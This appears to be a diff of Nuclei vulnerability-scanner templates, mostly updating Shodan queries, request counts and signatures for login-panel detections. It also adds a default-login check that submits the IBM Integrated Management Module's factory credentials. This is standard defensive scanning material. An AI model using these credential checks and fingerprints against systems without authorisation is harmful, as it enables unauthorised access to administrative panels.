- https://nvd.nist.gov/vuln/detail/CVE-2024-21645
|
||||
- https://github.com/fkie-cad/nvd-json-data-feeds
|
||||
impact: |
|
||||
Forged or otherwise, corrupted log files can be used to cover an attacker's tracks or even to implicate another party in the commission of a malicious act.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
|
||||
cvss-score: 5.3
|
||||
cve-id: CVE-2024-21645
|
||||
cwe-id: CWE-74
|
||||
cpe: cpe:2.3:a:pyload:pyload:*:*:*:*:*:*:*:*
|
||||
epss-score: 0.00046
|
||||
epss-percentile: 0.13723
|
||||
cpe: cpe:2.3:a:pyload:pyload:*:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
verified: true
|
||||
vendor: pyload
|
||||
product: pyload
|
||||
shodan-query: title:"pyload"
|
||||
shodan-query: "title:\"pyload\""
|
||||
max-request: 2
|
||||
tags: cve,cve2024,pyload,authenticated,injection
|
||||
|
||||
variables:
|
||||
|
@ -59,4 +60,4 @@ http:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 4a0a00473045022100e4681bad6b75b2295f0256953d1d293a42d79e61b3607a307caf6cc5b040ccbb02201912657be888fe3a799ada24aaa1de05d3667731e84900bedb0e556a187f2dfc:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 490a0046304402203cbf3ae7a02a2a68165345f0bd855eb6ab923669c8d2aa78f2922e0baee747f702201104ac76e942d9f3bff9d59b6e4227e4d59ff27e41aeca67e1138508b572d5b9:922c64590222798bb761d5b6d8e72950
|
|
@ -18,8 +18,9 @@ info:
|
|||
cpe: cpe:2.3:a:ivanti:connect_secure:9.0:-:*:*:*:*:*:*
|
||||
metadata:
|
||||
vendor: ivanti
|
||||
product: connect_secure
|
||||
product: "connect_secure"
|
||||
shodan-query: "html:\"welcome.cgi?p=logo\""
|
||||
max-request: 1
|
||||
tags: cve,cve2024,kev,ssrf,ivanti
|
||||
|
||||
http:
|
||||
|
@ -43,4 +44,4 @@ http:
|
|||
- '/dana-na/'
|
||||
- 'WriteCSS'
|
||||
condition: and
|
||||
# digest: 4a0a00473045022100fefc6637185b28b4af8b503bdb7b89401fc591c34cb6082b20322ac0f1ad67c8022027e634cbc733ad699766de6d8eb8f22b6368d0b663cd28cbd957eaaf37f51838:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a00473045022031bba2e0349c9af3102196e00e85678ddbb51ba287e5d624558a50a3bbaa6be20221008a362ec4ef64ece7ab22636b902c72df49e1f72c519731e5c2eb22dec2db5c76:922c64590222798bb761d5b6d8e72950
|
|
@ -8,7 +8,8 @@ info:
|
|||
- https://www.ibm.com/docs/en/odm/8.0.1?topic=users-tutorial-getting-started-decision-center-business-console
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: title="Decision Center | Business Console"
|
||||
shodan-query: "title=\"Decision Center | Business Console\""
|
||||
max-request: 1
|
||||
tags: ibm,default-login,decision-center
|
||||
|
||||
http:
|
||||
|
@ -42,4 +43,4 @@ http:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 4a0a0047304502205523a863445a05acb27e5d7ae6cb824465b467afcd5bf3f7f916c78ff4853b54022100f6e82a4f9f222831b97dcb7bf5d0a3410048123eface5f0840f9571b5c31ac2d:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a00473045022016a80ca652cc1c45b3f6d4c92fce061f9fc9d9cb8d9cfe96626d34be23038086022100bc041f5982bff0cd5c6c76e96a375e3be9dcfdd433a205870a938cc378c23418:922c64590222798bb761d5b6d8e72950
|
|
@ -8,7 +8,8 @@ info:
|
|||
- https://www.ibm.com/docs/en/odm/8.5.1?topic=console-tutorial-getting-started-decision-center-enterprise
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: html="Decision Center Enterprise console"
|
||||
shodan-query: "html=\"Decision Center Enterprise console\""
|
||||
max-request: 1
|
||||
tags: ibm,default-login,decision-center
|
||||
|
||||
http:
|
||||
|
@ -42,4 +43,4 @@ http:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 4a0a00473045022100f49bccdf778836b24be61c1c569daa47361ed0b8f9f3b1832055b5bc2a007f1502206ce043ef3f1813f97d2ff4376fadf94112238eed01bfb77c3d404179a8b760b4:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a00473045022100eda449ebab75e6434f62e1e6ad214e7a3a4cbc01f47209e6f2367427fc73892f02202b8e060110bc0d3aed5fc0e773daa6416705f332e863b1f851a004b1364615be:922c64590222798bb761d5b6d8e72950
|
|
@ -8,7 +8,8 @@ info:
|
|||
- https://www.ibm.com/docs/en/odm/8.8.0?topic=center-overview-decision
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: title:"Rule Execution Server"
|
||||
shodan-query: "title:\"Rule Execution Server\""
|
||||
max-request: 1
|
||||
tags: ibm,default-login,decision-server
|
||||
|
||||
http:
|
||||
|
@ -43,4 +44,4 @@ http:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 4b0a00483046022100e2da7214e13a57c4441de262e1f4377d8decac405644528c512f6298514f47ac022100f1ac476ef1244aed60da4511ef21547cb5d7cbd6238124f45f040fadc6796b39:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a004730450220196e8fb1a9ddef98855c38f2719f3c5405d7c51e90772f82c6d35c0d7596cc06022100cc5faf04711e248eb7c4c8b2fd597c8346977de7602568861691790ec7a56b1b:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,44 @@
|
|||
id: imm-default-login
|
||||
|
||||
info:
|
||||
name: Integrated Management Module - Default Login
|
||||
author: jpg0mez
|
||||
severity: high
|
||||
description: |
|
||||
Integrated Management Module default login credentials were discovered.
|
||||
reference:
|
||||
- https://pubs.lenovo.com/x3650-m4/t_logging_web_interface
|
||||
- https://www.ibm.com/docs/en/tcs-service?topic=oip-logging-imm-web-interface
|
||||
classification:
|
||||
cwe-id: CWE-798
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 1
|
||||
fofa-query: "integrated management module"
|
||||
shodan-query: html:"ibmdojo"
|
||||
tags: imm,ibm,default-login
|
||||
|
||||
http:
|
||||
- method: POST
|
||||
path:
|
||||
- "{{BaseURL}}/data/login"
|
||||
body: "user=USERID&password=PASSW0RD"
|
||||
|
||||
redirects: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<authResult>0</authResult>"
|
||||
- 'authResult":"0'
|
||||
condition: or
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "index-console.php"
|
||||
- "home.php"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -7,8 +7,9 @@ info:
|
|||
reference:
|
||||
- https://documentation.softwareag.com/
|
||||
metadata:
|
||||
shodan-query: "http.favicon.hash:-234335289"
|
||||
max-request: 5
|
||||
verified: true
|
||||
shodan-query: http.favicon.hash:-234335289
|
||||
tags: default-login,webmethod
|
||||
|
||||
flow: http(1) && http(2)
|
||||
|
@ -63,4 +64,4 @@ http:
|
|||
- Invalid credentials
|
||||
negative: true
|
||||
condition: and
|
||||
# digest: 4a0a00473045022100c2ff9832495b567326f60a3290cab01226778deef5fb3b3cc77288024507dce7022035ca48f6387403fbaccecdec948c4473ce0e90f135fc8b17cc5c3c28c8d54d70:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a004730450220115d89c488b0862bb1273fe0b0298087afa5b74b011991ae1cebba5921795590022100a3bbc39dba847eadccd27ed89d597a41e3a4508393fae04c9c017f35f0b9db36:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,37 @@
|
|||
id: cisco-unity-panel
|
||||
|
||||
info:
|
||||
name: Cisco Unity Connection Panel - Detect
|
||||
author: HeeresS
|
||||
severity: info
|
||||
description: |
|
||||
A Cisco Unity Connection instance was detected.
|
||||
metadata:
|
||||
shodan-query: "html:\"Cisco Unity Connection\""
|
||||
max-request: 2
|
||||
verified: true
|
||||
tags: panel,cisco,unity,login,detect
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/cuadmin/home.do"
|
||||
- "{{BaseURL}}"
|
||||
|
||||
stop-at-first-match: true
|
||||
|
||||
host-redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "Cisco Unity Connection Administration"
|
||||
- ">Cisco Unity Connection</a>"
|
||||
condition: or
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 490a00463044022022e561912a02fb0baa91f246eebc3a05855972f2bab1224383889c1dfc20e20b02201a6bfd866f1ed3a945fb0c8a615a7b41244c13f0286921c37b72d89b08e95e70:922c64590222798bb761d5b6d8e72950
|
|
@ -11,10 +11,9 @@ info:
|
|||
- https://dockge.kuma.pet/
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 2
|
||||
shodan-query: title:"Dockge"
|
||||
max-request: 1
|
||||
shodan-query: "title:\"Dockge\""
|
||||
tags: panel,dockge,login
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
|
@ -32,4 +31,4 @@ http:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 490a0046304402207b4b31e89b41d54ec47a046fbbfcff3b303e68aff67845ca51b890588d9c2f180220712c5d5677eb71010f6ec9f123f1f4a074bc531998dba39a0c8a287a7e5cf40d:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a0047304502204b3172c4c1a24716f7a36595e882653be64ea2699acebc7150c9bb87487c4b7302210091e20d9ea7ba962951c9bd8836bb065e490b7c99eda7f2b34b8209c155ebd94b:922c64590222798bb761d5b6d8e72950
|
|
@ -5,12 +5,13 @@ info:
|
|||
author: righettod
|
||||
severity: info
|
||||
description: |
|
||||
EasyJOB login panel was detected.
|
||||
EasyJOB login panel was detected.
|
||||
reference:
|
||||
- https://www.en.because-software.com/software/easyjob/
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: http.title:"Log in - easyJOB"
|
||||
shodan-query: "http.title:\"Log in - easyJOB\""
|
||||
max-request: 1
|
||||
tags: panel,easyjob,login
|
||||
|
||||
http:
|
||||
|
@ -31,4 +32,4 @@ http:
|
|||
group: 1
|
||||
regex:
|
||||
- 'easyJOB\s+([0-9.]+)'
|
||||
# digest: 4a0a004730450220411982e48718601305b05a93c91be6a680ce993e5e110400b0dabbff753fe0bb02210091af5cbecc2fd766de347dad93c4a3e105a0d3f5a4a8f7a002bdb838c3bc2fad:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a00473045022100f82e7fbb4c360cb536e24b99b8f65c91e8d46ebbc0f45a156d6074c154e202a402203334ffeaa0ca0e92f85d5ddcfd516f44ec9fbc55655b5351d2e193726e2b2248:922c64590222798bb761d5b6d8e72950
|
|
@ -7,12 +7,11 @@ info:
|
|||
description: GoAnywhere Managed File Transfer login panel was detected.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||
cvss-score: 0
|
||||
cwe-id: CWE-200
|
||||
metadata:
|
||||
shodan-query: "http.html:\"GoAnywhere Managed File Transfer\""
|
||||
verified: true
|
||||
max-request: 1
|
||||
shodan-query: http.html:"GoAnywhere Managed File Transfer"
|
||||
max-request: 2
|
||||
tags: panel,goanywhere,login,filetransfer
|
||||
|
||||
http:
|
||||
|
@ -35,4 +34,4 @@ http:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 4b0a00483046022100947f00fcac2bdcc793453ed15706359afde89947675258107183adb0f5b622f7022100e9295654f6ab5e2e2c8f63f28b7e99923b92cca82532de2b9314927aecaf52c6:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a0047304502206418902cc87923995e4a87a3036d1a138bae03cb012fde34e44df55ce4504dac022100cac92b3dee719aff4f1d10544579c719236bf9dca63006ef5e0e0741aee209b2:922c64590222798bb761d5b6d8e72950
|
|
@ -11,7 +11,8 @@ info:
|
|||
vendor: gotify
|
||||
product: server
|
||||
verified: true
|
||||
shodan-query: http.title:"Gotify"
|
||||
shodan-query: "http.title:\"Gotify\""
|
||||
max-request: 1
|
||||
tags: panel,gotify,login,detect
|
||||
|
||||
http:
|
||||
|
@ -32,4 +33,4 @@ http:
|
|||
group: 1
|
||||
regex:
|
||||
- '"version":"([0-9.]+)"'
|
||||
# digest: 4b0a00483046022100c306600c5a3f75ebdbc6d89aeb4a9042c616f870d869819424686889a568b7880221008c14b6498f5d7f935e09fe01a8f4bda2c761f2692a59202766cb798135336ae9:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 490a0046304402204ed0fc61c5fdaec5869843788c59849c687bfe8b39891df7eab06b029e516749022055341de709d14d202015b389e25139b06ed1398ab952f6a2a39cd2ecf6a343de:922c64590222798bb761d5b6d8e72950
|
|
@ -13,9 +13,9 @@ info:
|
|||
cvss-score: 5.3
|
||||
cwe-id: CWE-200
|
||||
metadata:
|
||||
max-request: 2
|
||||
vendor: grails
|
||||
product: grails
|
||||
max-request: 2
|
||||
tags: grails,panel
|
||||
|
||||
http:
|
||||
|
@ -34,4 +34,4 @@ http:
|
|||
words:
|
||||
- "Sorry, remote connections ('webAllowOthers') are disabled on this server"
|
||||
negative: true
|
||||
# digest: 4a0a0047304502204ea638d90bf728298450d4bf071d113ae80087d4e5001d971617212faf1e375c022100dac85d19d2f65956875f904ce9e025a55c229cae307af3e03fa7708c190b8ef6:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a00473045022100f7857a61a4ccdef275c890a466396f0aef331e21c33e1ab4e86f6cd2c4f3c4a4022025d9b94b715dc2b8c625ba3a8111008a7f2039dd829d7b2bef2414ba73e51ced:922c64590222798bb761d5b6d8e72950
|
|
@ -9,7 +9,8 @@ info:
|
|||
- https://www.haivision.com/
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: http.title:"Haivision Gateway"
|
||||
shodan-query: "http.title:\"Haivision Gateway\""
|
||||
max-request: 1
|
||||
tags: panel,haivision,login,detect
|
||||
|
||||
http:
|
||||
|
@ -23,4 +24,4 @@ http:
|
|||
- 'status_code == 200'
|
||||
- 'contains_any(body, "<title>Haivision Gateway", "content=\"Haivision Gateway")'
|
||||
condition: and
|
||||
# digest: 4b0a0048304602210086238eba9398bb797b00f86ef36db758f4962c0d8247070cf8b2554bdbc4b649022100c49ebd06f35893af713c00909b8f98abbae0f3ab6230d799ad0acf6147196e68:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 490a0046304402200b774f9123ccefe48635e129de64e264ee5b5b5882a63118c8e59935903bd895022057bd039a93248ba6b03b8c1078549b1e74b89f06fef7cc311d719dc909801370:922c64590222798bb761d5b6d8e72950
|
|
@ -9,9 +9,9 @@ info:
|
|||
- https://www.haivision.com/
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: http.title:"Haivision Media Platform"
|
||||
shodan-query: "http.title:\"Haivision Media Platform\""
|
||||
max-request: 1
|
||||
tags: panel,haivision,login,detect
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
|
@ -23,4 +23,4 @@ http:
|
|||
- 'status_code == 200'
|
||||
- 'contains_any(body, "<title>Haivision Media Platform", "content=\"Haivision Network Video")'
|
||||
condition: and
|
||||
# digest: 4a0a00473045022100852a82de658ce3156eed4bb9e4faf88dd4e709f258d2f188cd2aaa6f07d6e85a022079da3770440c2b448ce933600e28d1644f9a9747c3008c9e3b7f2d1f978f9e98:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 490a0046304402205b887d409f93bb8c6bca75ccede4fb4ede2c9c827e9b47af66ef16486efe5bed022013582e7154224d6596931d51c61ce2b4c11d03fc9682a4b29f4731c8cd797b21:922c64590222798bb761d5b6d8e72950
|
|
@ -10,7 +10,8 @@ info:
|
|||
- https://www.ibm.com/docs/en/odm/8.5.1?topic=console-tutorial-getting-started-decision-center-enterprise
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: html:"Decision Center Enterprise console"
|
||||
shodan-query: "html:\"Decision Center Enterprise console\""
|
||||
max-request: 1
|
||||
tags: panel,ibm,login,detect,decision-center
|
||||
|
||||
http:
|
||||
|
@ -30,4 +31,4 @@ http:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 4a0a00473045022100c1586e66a4f5b442e8b98fc0197d38db06f862c0aa724aad823686560f8af3150220651109acecc6891e0802e326f21c5261822dbc69bee767c5e4eb04cd73c0026e:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a004730450221008667c30c6129e740f22587180d65bef7ea8c9bc5e42073143338ea019a73840d022004dfe32d460d9554f364fc00d8db42df22960b4dbfde97ec9101a158366ad22e:922c64590222798bb761d5b6d8e72950
|
|
@ -10,7 +10,8 @@ info:
|
|||
- https://www.ibm.com/docs/en/odm/8.12.0?topic=overview-introducing-rule-execution-server
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: title:"Rule Execution Server"
|
||||
shodan-query: "title:\"Rule Execution Server\""
|
||||
max-request: 1
|
||||
tags: panel,ibm,login,detect,decision-server
|
||||
|
||||
http:
|
||||
|
@ -30,4 +31,4 @@ http:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 4a0a0047304502204d00e79a36864310511d3945c877939d641c2eacd7d408a2786aa413851bacd0022100f12605169ab70c9beb895a8691d7cb6f2ca099f3c6bdc7ffe6c2f7b818010135:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a00473045022100f8a6779c2c863e990a8f3761c1fbc8d9a2aac9c60e69c8feb80a9b48a5660cf102207f75f60642c2257b39595c992440af15edf913738771b226230ebd0d27350410:922c64590222798bb761d5b6d8e72950
|
|
@ -10,7 +10,8 @@ info:
|
|||
- https://www.ibm.com/docs/en/odm/8.12.0
|
||||
metadata:
|
||||
verified: true
|
||||
fofa-query: title="Decision Center | Business Console"
|
||||
fofa-query: "title=\"Decision Center | Business Console\""
|
||||
max-request: 1
|
||||
tags: panel,ibm,login,detect,decision-center
|
||||
|
||||
http:
|
||||
|
@ -28,4 +29,4 @@ http:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 4a0a00473045022100d52dbff62d09aa1893a69601b6ebddcee476872b7bb74d935c4e313e8d76578e0220590a89cfb7fc87044c7c7dd5e7def60b1c02374a7671d2affc6a164a3045e4a8:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4b0a00483046022100b3e217aca2f0e7f4749d018a3aa54ce7d31b691b0feace4be2ea8945691b24a002210092adc4f4e4095474a2915ebe62b11db7981f79fe08a1ce086adc6ddfd2c7811a:922c64590222798bb761d5b6d8e72950
|
|
@ -10,10 +10,10 @@ info:
|
|||
- https://www.ivanti.com/products/connect-secure-vpn
|
||||
metadata:
|
||||
vendor: ivanti
|
||||
product: connect_secure
|
||||
product: "connect_secure"
|
||||
verified: true
|
||||
max-request: 1
|
||||
shodan-query: title:"Ivanti Connect Secure"
|
||||
max-request: 2
|
||||
shodan-query: "title:\"Ivanti Connect Secure\""
|
||||
tags: panel,connectsecure,login
|
||||
|
||||
http:
|
||||
|
@ -35,4 +35,4 @@ http:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 4a0a00473045022100d585f9e252400d8b89e35a904465bc72b1832386ab12f0554abcefd5a8be293e02202a923fe7c0fc9e7ee34ae5f72b28a5683ab136b9a664779fc942b61847b84a52:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4b0a00483046022100c4feca263103f90d4e4077e98702f3dd3dbf5c455ecfb5ed45115b96ad11372c022100ba71de0184707063914de8dee85d4e4930735f2609448a0470e38c0198003b7a:922c64590222798bb761d5b6d8e72950
|
|
@ -10,12 +10,11 @@ info:
|
|||
- https://www.juniper.net/documentation/us/en/software/jweb-ex/jweb-ex-application-package/topics/concept/ex-series-j-web-interface-overview.html
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||
cvss-score: 0.0
|
||||
cwe-id: CWE-200
|
||||
metadata:
|
||||
max-request: 2
|
||||
max-request: 1
|
||||
verified: true
|
||||
shodan-query: http.title:"Juniper Web Device Manager"
|
||||
shodan-query: "http.title:\"Juniper Web Device Manager\""
|
||||
tags: panel,juniper,vpn,login
|
||||
|
||||
http:
|
||||
|
@ -43,4 +42,4 @@ http:
|
|||
group: 1
|
||||
regex:
|
||||
- 'var modelphpStr = "(.*?)";'
|
||||
# digest: 4b0a00483046022100fc6761f1e20dc648ed664ad95d12ebbf947321c37644528bc30edc2a7bc4918d0221009f32657ac7c105b55a5dbe72bb6f2d59f11c4f73563b60a96c5153f99d25b636:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a0047304502205ca23f303d8fa1ef26270300c55737695329a18b419a0eaa9c633ec3d476a6b902210089ea66b95ddb52fa15accc8bebc0824d44dc509c97674017cf72d1a0ba8c0997:922c64590222798bb761d5b6d8e72950
|
|
@ -10,13 +10,12 @@ info:
|
|||
- https://github.com/provectus/kafka-ui
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||
cvss-score: 0
|
||||
cwe-id: CWE-200
|
||||
metadata:
|
||||
vendor: provectus
|
||||
product: ui
|
||||
platform: kafka
|
||||
max-request: 1
|
||||
max-request: 2
|
||||
tags: panel,kafka,apache,detect
|
||||
|
||||
http:
|
||||
|
@ -45,4 +44,4 @@ http:
|
|||
group: 1
|
||||
regex:
|
||||
- '"v([0-9.]+)"'
|
||||
# digest: 490a004630440220120fd70d830d5673b6694bc74d5d5cdd0f17420aba4ae2000532dbcb795c6584022001816294148c66bde9fe384d304fd6f1b4bbedafc160454c3f9e0b5183f4e601:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a0047304502210091554843ef5d12adad3dd9e9d9ba5b82adc7a34ba448aaf4e12449bad284693e022034ed2d535005bac5972abee730948bb14439734f919d1b516f886b50ff402038:922c64590222798bb761d5b6d8e72950
|
|
@ -37,9 +37,10 @@ http:
|
|||
- "alt=\"Keycloak"
|
||||
- "kc-form-buttons"
|
||||
- "/keycloak/img/favicon.ico"
|
||||
- "/admin/keycloak/"
|
||||
condition: or
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 4a0a00473045022100ce99a9168d9735401c84081a0b8c389cebe54d781b5616f4d42390b7b920373a02206394e01504f7c25820d9154260d135c341af22fd6e392b37412ecbd99b9403bd:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4b0a00483046022100dd6221af8f8b9f571a28611b54d652f7568da86dce1654fa1a73962e720bf2cf022100ed7bd96937ba0a702f5889f0827638671d3ffbd3e98bba852bd274542e59ae0f:922c64590222798bb761d5b6d8e72950
|
|
@ -9,7 +9,8 @@ info:
|
|||
- https://kopano.com/
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: http.title:"Kopano WebApp"
|
||||
shodan-query: "http.title:\"Kopano WebApp\""
|
||||
max-request: 1
|
||||
tags: panel,kopano,login,detect
|
||||
|
||||
http:
|
||||
|
@ -33,4 +34,4 @@ http:
|
|||
group: 1
|
||||
regex:
|
||||
- '\?kv([0-9.]+)"'
|
||||
# digest: 4a0a0047304502205ae240e238fffb87a0154ac0e19299328e5fd7f4e02f7cd8b5e0c74e304c8166022100ec2e323a3aa419e061a0504a4864efde49aa02f6272eb5b8c511960367a042e1:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 490a004630440220499c97ef6976f50be4391e8eeb0ddfeb3fcbe37bec5a7fe24d71c473e6b3d673022070949daf15a245428269d09199e9f2377b400261229944d98137f800b4e0f3a8:922c64590222798bb761d5b6d8e72950
|
|
@ -10,7 +10,8 @@ info:
|
|||
- https://github.com/linagora/linshare
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: http.title:"LinShare"
|
||||
shodan-query: "http.title:\"LinShare\""
|
||||
max-request: 3
|
||||
tags: panel,linshare,login,detect
|
||||
|
||||
http:
|
||||
|
@ -30,4 +31,4 @@ http:
|
|||
- 'status_code == 200'
|
||||
- 'contains_any(body, "<title>LinShare", "x-ng-app=\"linshareAdminApp")'
|
||||
condition: and
|
||||
# digest: 4a0a0047304502207dcbdcd3215abf97fd2c12ef382bf488ddfa0f31ff0f717491fd3b0bf6bd9368022100b838aab3468abf4fe5755bfdb54b4a238263bda36c0ea794d661efa2b18880f8:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a00473045022100ca5993c797cf75bbaa9653d71b58a8c69d527adaceac8589f0e96b9e49c8d38f02207eac6b0a379abc14b4907532c15a5ad9f9f62ef6b0852286904753a93af8019c:922c64590222798bb761d5b6d8e72950
|
|
@ -2,20 +2,25 @@ id: odoo-panel
|
|||
|
||||
info:
|
||||
name: Odoo - Panel Detect
|
||||
author: DhiyaneshDK
|
||||
author: DhiyaneshDK,righettod
|
||||
severity: info
|
||||
metadata:
|
||||
vendor: odoo
|
||||
product: odoo
|
||||
verified: true
|
||||
max-request: 1
|
||||
shodan-query: title:"Odoo"
|
||||
max-request: 2
|
||||
shodan-query: "title:\"Odoo\""
|
||||
tags: login,panel,odoo
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/web/login"
|
||||
- "{{BaseURL}}"
|
||||
|
||||
stop-at-first-match: true
|
||||
host-redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
@ -23,8 +28,14 @@ http:
|
|||
part: body
|
||||
words:
|
||||
- '<title>Odoo</title>'
|
||||
- 'odoo.session_info'
|
||||
- 'web.layout.odooscript'
|
||||
condition: or
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'Log in'
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
|
@ -34,4 +45,4 @@ http:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 4a0a00473045022100a4ee6283d4c0264ea8d9ac9e56e2c948d50afbb650ac84735d4978ada4bfcdf802207a1bf2401f730d11a14cc03bea4d3e2ac98aae9ad05856f7a41359be3b31eda1:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a0047304502202c94e6e7ce327a1d5e088428410c9e0bb977cfd163434b7a8e449af58b032a9c0221009dbebd38cac6453fb54b396854eae6bcef87f5f70980bf2b82610cfb98fdcb54:922c64590222798bb761d5b6d8e72950
|
|
@ -5,14 +5,14 @@ info:
|
|||
author: righettod
|
||||
severity: info
|
||||
description: |
|
||||
Passbolt login panel was detected.
|
||||
Passbolt login panel was detected.
|
||||
reference:
|
||||
- https://www.passbolt.com/
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: http.title:"Passbolt | Open source password manager for teams"
|
||||
shodan-query: "http.title:\"Passbolt | Open source password manager for teams\""
|
||||
max-request: 1
|
||||
tags: panel,passbolt,login
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
|
@ -31,4 +31,4 @@ http:
|
|||
group: 1
|
||||
regex:
|
||||
- '(?i)v=([0-9a-z.-]+)'
|
||||
# digest: 4b0a00483046022100cd46bf88248b5f3ddfbaf30d8f17602a0168b6080418f686067b8482f9b37b570221008b497e1c5529c20f6202974940db3d83ca0be3737bab1799bd727c314e17a142:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 490a0046304402207f1b9037354038919a4460781c2f126b5ca46c7d67c0af2aa6f9653d51573ce2022048ad39d72b06d3603428ca396cf315280273241fbf01fe026e55d2d9f9a4f964:922c64590222798bb761d5b6d8e72950
|
|
@ -7,13 +7,12 @@ info:
|
|||
description: phpMyAdmin panel was detected.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||
cvss-score: 0
|
||||
cwe-id: CWE-200
|
||||
metadata:
|
||||
shodan-query: "http.title:phpMyAdmin"
|
||||
vendor: phpmyadmin
|
||||
product: phpmyadmin
|
||||
max-request: 12
|
||||
shodan-query: http.title:phpMyAdmin
|
||||
max-request: 13
|
||||
tags: panel,phpmyadmin
|
||||
|
||||
http:
|
||||
|
@ -46,4 +45,4 @@ http:
|
|||
group: 1
|
||||
regex:
|
||||
- 'v=([a-z0-9-._]+)'
|
||||
# digest: 490a0046304402203073d075e05bc85ce417b3db20f3c9b6c7a32c22768f7ad39c75ffa91712bb4d022006c2a3c1552f7209c345f11c66087db13eef087aff98dead27a5c4a6f0fa4f54:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 490a0046304402205a7d1860670db2b7c7fe2c51ee5bca11729bf56ee88e3194b9f7cb90959a3ad10220664c394c6cca2ebeceb2166bc8a9d4c78b949ac13ebd420bc441fc7a22adc6af:922c64590222798bb761d5b6d8e72950
|
|
@ -7,14 +7,13 @@ info:
|
|||
description: Proofpoint Protection Server panel was detected.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||
cvss-score: 0
|
||||
cwe-id: CWE-200
|
||||
metadata:
|
||||
product: "proofpoint protection server"
|
||||
shodan-query: "http.favicon.hash:942678640"
|
||||
verified: true
|
||||
max-request: 1
|
||||
max-request: 2
|
||||
vendor: proofpoint
|
||||
product: proofpoint protection server
|
||||
shodan-query: http.favicon.hash:942678640
|
||||
tags: panel,proofpoint,login,detect
|
||||
|
||||
http:
|
||||
|
@ -41,4 +40,4 @@ http:
|
|||
part: header
|
||||
words:
|
